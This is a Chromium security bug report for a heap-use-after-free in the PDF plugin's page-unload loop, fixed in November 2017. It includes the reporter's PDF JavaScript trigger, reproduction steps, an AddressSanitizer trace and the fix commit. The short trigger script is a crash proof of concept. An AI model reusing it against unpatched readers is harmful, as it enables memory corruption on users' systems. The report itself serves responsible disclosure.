New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Nov 9
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , iOS , Chrome , Mac
Pri: 1
Type: Bug-Security



Sign in to add a comment
Heap-use-after-free in PDFiumEngine::HandleEvent
Reported by chamal.d...@gmail.com, Nov 1 Back to list
VULNERABILITY DETAILS
Bug is in below mentioned code in PDFiumEngine::HandleEvent method of pdfium_engine.cc.
     
for (int page_index : deferred_page_unloads_)
  pages_[page_index]->Unload();

It is possible to fire a "Lost Focus" event of a form field through pages_[page_index]->Unload()".
It is possible to add another item to "deferred_page_unloads_" vector through "Lost Focus" event.
This will invalidate the iterator of above for loop.

test.pdf file contains below mentioned Javascript.
Document Javascript section
----------------------------
function test() {
this.getField('txt2').setFocus();
this.getField('txt3').setFocus();
this.getField('txt2').setFocus();
}
app.setTimeOut('test()',1000);

Lose Focus event of "txt2" text field
-------------------------------------
m = this.pageNum;

VERSION
Chrome Version: [62.0.3202.62] + [stable]
                [64.0.3256.0] + [Trunk build]
Operating System: [Ubuntu 16.04]
                  * On Windows release build this does not crash.
                    On a Windows debug build PDF process crash with an assert. failiure.

REPRODUCTION CASE
1. Open test.pdf file with chrome.pdf.
2. Wait 1 second.
3. Move mouse over PDF document.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF process]
Crash State: [Address Sanitizer output]
==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000013374 at pc 0x55688ff94618 bp 0x7ffdedfdff90 sp 0x7ffdedfdff88
READ of size 4 at 0x602000013374 thread T0 (chrome)
    #0 0x55688ff94617 in chrome_pdf::PDFiumEngine::HandleEvent(pp::InputEvent const&) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:1402:23
    #1 0x55688ff6172d in chrome_pdf::OutOfProcessInstance::HandleInputEvent(pp::InputEvent const&) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:717:16
    #2 0x55688132c322 in pp::InputEvent_HandleEvent(int, int) /home/chamal/chromium/src/out/asan/../../ppapi/cpp/module.cc:53:32
    #3 0x55688d7275be in CallWhileUnlocked<PP_Bool, int, int, int, int> /home/chamal/chromium/src/out/asan/../../ppapi/shared_impl/proxy_lock.h:135:10
    #4 0x55688d7275be in ppapi::proxy::PPP_InputEvent_Proxy::OnMsgHandleFilteredInputEvent(int, ppapi::InputEventData const&, PP_Bool*) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/ppp_input_event_proxy.cc:107:0
    #5 0x55688d7270b4 in DispatchToMethodImpl<ppapi::proxy::PPP_InputEvent_Proxy *, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, const ppapi::InputEventData &, PP_Bool *), std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool>, 0, 1, 0> /home/chamal/chromium/src/out/asan/../../base/tuple.h:94:3
    #6 0x55688d7270b4 in DispatchToMethod<ppapi::proxy::PPP_InputEvent_Proxy *, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, const ppapi::InputEventData &, PP_Bool *), std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool> > /home/chamal/chromium/src/out/asan/../../base/tuple.h:105:0
    #7 0x55688d7270b4 in bool IPC::MessageT<PpapiMsg_PPPInputEvent_HandleFilteredInputEvent_Meta, std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool> >::Dispatch<ppapi::proxy::PPP_InputEvent_Proxy, ppapi::proxy::PPP_InputEvent_Proxy, void, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, ppapi::InputEventData const&, PP_Bool*)>(IPC::Message const*, ppapi::proxy::PPP_InputEvent_Proxy*, ppapi::proxy::PPP_InputEvent_Proxy*, void*, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, ppapi::InputEventData const&, PP_Bool*)) /home/chamal/chromium/src/out/asan/../../ipc/ipc_message_templates.h:204:0
    #8 0x55688d7266ee in ppapi::proxy::PPP_InputEvent_Proxy::OnMessageReceived(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/ppp_input_event_proxy.cc:85:5
    #9 0x55688d693de2 in ppapi::proxy::PluginDispatcher::OnMessageReceived(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/plugin_dispatcher.cc:273:22
    #10 0x556884279dda in IPC::ChannelProxy::Context::OnDispatchMessage(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ipc/ipc_channel_proxy.cc:320:14
    #11 0x556881f9a127 in Run /home/chamal/chromium/src/out/asan/../../base/callback.h:64:12
    #12 0x556881f9a127 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/chamal/chromium/src/out/asan/../../base/debug/task_annotator.cc:57:0
    #13 0x556881ffd09a in base::MessageLoop::RunTask(base::PendingTask*) /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:394:25
    #14 0x556881ffe4ad in DeferOrRunPendingTask /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:406:5
    #15 0x556881ffe4ad in base::MessageLoop::DoWork() /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:450:0
    #16 0x556882005eb9 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/chamal/chromium/src/out/asan/../../base/message_loop/message_pump_default.cc:37:31
    #17 0x55688207d0b1 in base::RunLoop::Run() /home/chamal/chromium/src/out/asan/../../base/run_loop.cc:114:14
    #18 0x5568812bc01d in content::PpapiPluginMain(content::MainFunctionParams const&) /home/chamal/chromium/src/out/asan/../../content/ppapi_plugin/ppapi_plugin_main.cc:160:19
    #19 0x5568815845d3 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) /home/chamal/chromium/src/out/asan/../../content/app/content_main_runner.cc:356:14
    #20 0x5568815877d7 in content::ContentMainRunnerImpl::Run() /home/chamal/chromium/src/out/asan/../../content/app/content_main_runner.cc:705:12
    #21 0x5568815ab641 in service_manager::Main(service_manager::MainParams const&) /home/chamal/chromium/src/out/asan/../../services/service_manager/embedder/main.cc:456:29
    #22 0x556881583e10 in content::ContentMain(content::ContentMainParams const&) /home/chamal/chromium/src/out/asan/../../content/app/content_main.cc:19:10
    #23 0x55687bf66c6f in ChromeMain /home/chamal/chromium/src/out/asan/../../chrome/app/chrome_main.cc:123:12
    #24 0x7fa11f04f82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291:0

0x602000013374 is located 4 bytes inside of 8-byte region [0x602000013370,0x602000013378)
freed by thread T0 (chrome) here:
    #0 0x55687bf64862 in operator delete(void*) ??:0:0
    #1 0x55687c21fe03 in __libcpp_deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:234:3
    #2 0x55687c21fe03 in deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1789:0
    #3 0x55687c21fe03 in deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1549:0
    #4 0x55687c21fe03 in ~__split_buffer /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__split_buffer:341:0
    #5 0x55687c21fe03 in void std::__1::vector<int, std::__1::allocator<int> >::__push_back_slow_path<int>(int&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1577:0
    #6 0x55688ff8a3b8 in push_back /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1613:9
    #7 0x55688ff8a3b8 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:3114:0
    #8 0x55688ffa9d9d in chrome_pdf::PDFiumEngine::GetMostVisiblePage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2705:3
    #9 0x55688ff866e4 in chrome_pdf::PDFiumEngine::Form_GetCurrentPage(_FPDF_FORMFILLINFO*, void*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:4061:21
    #10 0x55689001f4ca in GetCurrentPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:295:12
    #11 0x55689001f4ca in CPDFSDK_FormFillEnvironment::GetCurrentView() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:568:0
    #12 0x5568904e0abd in Document::get_page_num(CJS_Runtime*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:185:49
    #13 0x5568904f5de0 in void JSPropGetter<Document, &Document::get_page_num>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/JS_Define.h:78:23
    #14 0x55688027eeee in v8::internal::PropertyCallbackArguments::Call(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/api-arguments-inl.h:44:1
    #15 0x556880431ac8 in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1617:34
    #16 0x55688042f617 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1132:16
    #17 0x55688024d402 in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:452:5
    #18 0x556880265683 in __RT_impl_Runtime_LoadIC_Miss /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2050:5
    #19 0x556880265683 in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2033:0
    #13 0x7fa0e9e8469c  (<unknown module>)
    #14 0x7fa0e9ee4995  (<unknown module>)
    #15 0x7fa0e9e92a07  (<unknown module>)
    #16 0x7fa0e9e903f7  (<unknown module>)
    #17 0x7fa0e9e840fe  (<unknown module>)
    #20 0x55688001bf4f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:142:13
    #21 0x55688001b923 in CallInternal /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:178:10
    #22 0x55688001b923 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:188:0
    #23 0x55687f6ed670 in v8::Script::Run(v8::Local<v8::Context>) /home/chamal/chromium/src/out/asan/../../v8/src/api.cc:2090:7
    #24 0x55689059f4c3 in CFXJS_Engine::Execute(fxcrt::WideString const&, FXJSErr*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/fxjs_v8.cpp:476:25
    #25 0x5568904d452f in CJS_Runtime::ExecuteScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:209:14
    #26 0x556890567c5d in CJS_EventContext::RunScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:24
    #27 0x55689002f1a1 in CPDFSDK_ActionHandler::RunFieldJavaScript(CPDFSDK_FormFillEnvironment*, CPDF_FormField*, CPDF_AAction::AActionType, PDFSDK_FieldAction&, fxcrt::WideString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:513:25
    #28 0x5568900303dd in CPDFSDK_ActionHandler::ExecuteFieldAction(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&, std::__1::set<CPDF_Dictionary*, std::__1::less<CPDF_Dictionary*>, std::__1::allocator<CPDF_Dictionary*> >*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:249:9
    #29 0x55689002fed6 in CPDFSDK_ActionHandler::DoAction_Field(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:111:10
    #30 0x55689000ff34 in CPDFSDK_Widget::OnAAction(CPDF_AAction::AActionType, PDFSDK_FieldAction&, CPDFSDK_PageView*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_widget.cpp:1009:28
    #31 0x556890064660 in CFFL_InteractiveFormFiller::OnKillFocus(fxcrt::Observable<CPDFSDK_Annot>::ObservedPtr*, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/formfiller/cffl_interactiveformfiller.cpp:443:12
    #32 0x55689001ea24 in CPDFSDK_FormFillEnvironment::KillFocusAnnot(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:714:23

previously allocated by thread T0 (chrome) here:
    #0 0x55687bf63c42 in operator new(unsigned long) ??:0:0
    #1 0x55687c21fcce in __allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:226:10
    #2 0x55687c21fcce in allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1786:0
    #3 0x55687c21fcce in allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1541:0
    #4 0x55687c21fcce in __split_buffer /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__split_buffer:309:0
    #5 0x55687c21fcce in void std::__1::vector<int, std::__1::allocator<int> >::__push_back_slow_path<int>(int&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1572:0
    #6 0x55688ff8a3b8 in push_back /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1613:9
    #7 0x55688ff8a3b8 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:3114:0
    #8 0x55688ffa9d9d in chrome_pdf::PDFiumEngine::GetMostVisiblePage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2705:3
    #9 0x55688ff866e4 in chrome_pdf::PDFiumEngine::Form_GetCurrentPage(_FPDF_FORMFILLINFO*, void*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:4061:21
    #10 0x55689001f4ca in GetCurrentPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:295:12
    #11 0x55689001f4ca in CPDFSDK_FormFillEnvironment::GetCurrentView() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:568:0
    #12 0x5568904e0abd in Document::get_page_num(CJS_Runtime*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:185:49
    #13 0x5568904f5de0 in void JSPropGetter<Document, &Document::get_page_num>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/JS_Define.h:78:23
    #14 0x55688027eeee in v8::internal::PropertyCallbackArguments::Call(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/api-arguments-inl.h:44:1
    #15 0x556880431ac8 in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1617:34
    #16 0x55688042f617 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1132:16
    #17 0x55688024d402 in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:452:5
    #18 0x556880265683 in __RT_impl_Runtime_LoadIC_Miss /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2050:5
    #19 0x556880265683 in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2033:0
    #13 0x7fa0e9e8469c  (<unknown module>)
    #14 0x7fa0e9ee4995  (<unknown module>)
    #15 0x7fa0e9e92a07  (<unknown module>)
    #16 0x7fa0e9e903f7  (<unknown module>)
    #17 0x7fa0e9e840fe  (<unknown module>)
    #20 0x55688001bf4f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:142:13
    #21 0x55688001b923 in CallInternal /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:178:10
    #22 0x55688001b923 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:188:0
    #23 0x55687f6ed670 in v8::Script::Run(v8::Local<v8::Context>) /home/chamal/chromium/src/out/asan/../../v8/src/api.cc:2090:7
    #24 0x55689059f4c3 in CFXJS_Engine::Execute(fxcrt::WideString const&, FXJSErr*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/fxjs_v8.cpp:476:25
    #25 0x5568904d452f in CJS_Runtime::ExecuteScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:209:14
    #26 0x556890567c5d in CJS_EventContext::RunScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:24
    #27 0x55689002f1a1 in CPDFSDK_ActionHandler::RunFieldJavaScript(CPDFSDK_FormFillEnvironment*, CPDF_FormField*, CPDF_AAction::AActionType, PDFSDK_FieldAction&, fxcrt::WideString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:513:25
    #28 0x5568900303dd in CPDFSDK_ActionHandler::ExecuteFieldAction(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&, std::__1::set<CPDF_Dictionary*, std::__1::less<CPDF_Dictionary*>, std::__1::allocator<CPDF_Dictionary*> >*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:249:9
    #29 0x55689002fed6 in CPDFSDK_ActionHandler::DoAction_Field(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:111:10
    #30 0x55689000ff34 in CPDFSDK_Widget::OnAAction(CPDF_AAction::AActionType, PDFSDK_FieldAction&, CPDFSDK_PageView*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_widget.cpp:1009:28
    #31 0x556890064660 in CFFL_InteractiveFormFiller::OnKillFocus(fxcrt::Observable<CPDFSDK_Annot>::ObservedPtr*, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/formfiller/cffl_interactiveformfiller.cpp:443:12
    #32 0x55689001ea24 in CPDFSDK_FormFillEnvironment::KillFocusAnnot(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:714:23

 
test.pdf
2.9 KB Download
Also see https://codereview.chromium.org/2418533002 of  bug 653090 .
This fix indirectly helps to cause this bug.
Cc: rharrison@chromium.org
Components: Internals>Plugins>PDF
Labels: Security_Severity-High Security_Impact-Stable OS-Linux Pri-1
Owner: dsinclair@chromium.org
Status: Assigned
+dsinclair: can you look at this please?
Cc: tsepez@chromium.org
Labels: M-64 OS-Chrome OS-Mac OS-Windows
Status: Started
Project Member Comment 5 by bugdroid1@chromium.org, Nov 9
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/01c9a7e71ca435651723e8cbcab0b3ad4c5351e2

commit 01c9a7e71ca435651723e8cbcab0b3ad4c5351e2
Author: Dan Sinclair <dsinclair@chromium.org>
Date: Thu Nov 09 01:56:02 2017

[pdf] Use a temporary list when unloading pages

When traversing the |deferred_page_unloads_| list and handling the
unloads it's possible for new pages to get added to the list which will
invalidate the iterator.

This CL swaps the list with an empty list and does the iteration on the
list copy. New items that are unloaded while handling the defers will be
unloaded at a later point.

Bug:  780450 
Change-Id: Ic7ced1c82227109784fb536ce19a4dd51b9119ac
Reviewed-on: https://chromium-review.googlesource.com/758916
Commit-Queue: dsinclair <dsinclair@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Cr-Commit-Position: refs/heads/master@{#515056}
[modify] https://crrev.com/01c9a7e71ca435651723e8cbcab0b3ad4c5351e2/pdf/pdfium/pdfium_engine.cc

Status: Fixed
Project Member Comment 7 by sheriffbot@chromium.org, Nov 9
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one! The VRP panel decided to award $3,000 for this report!
Labels: -reward-unpaid reward-inprocess
Project Member Comment 12 by sheriffbot@chromium.org, Dec 15
Labels: Merge-Request-64
Project Member Comment 13 by sheriffbot@chromium.org, Dec 15
Labels: -Merge-Request-64 Hotlist-Merge-Review Merge-Review-64
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Hotlist-Merge-Review -Merge-Review-64 OS-iOS
Fix is already in 64
Labels: Release-0-M64
Labels: CVE-2018-6031
Project Member Comment 17 by sheriffbot@chromium.org, Feb 15
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment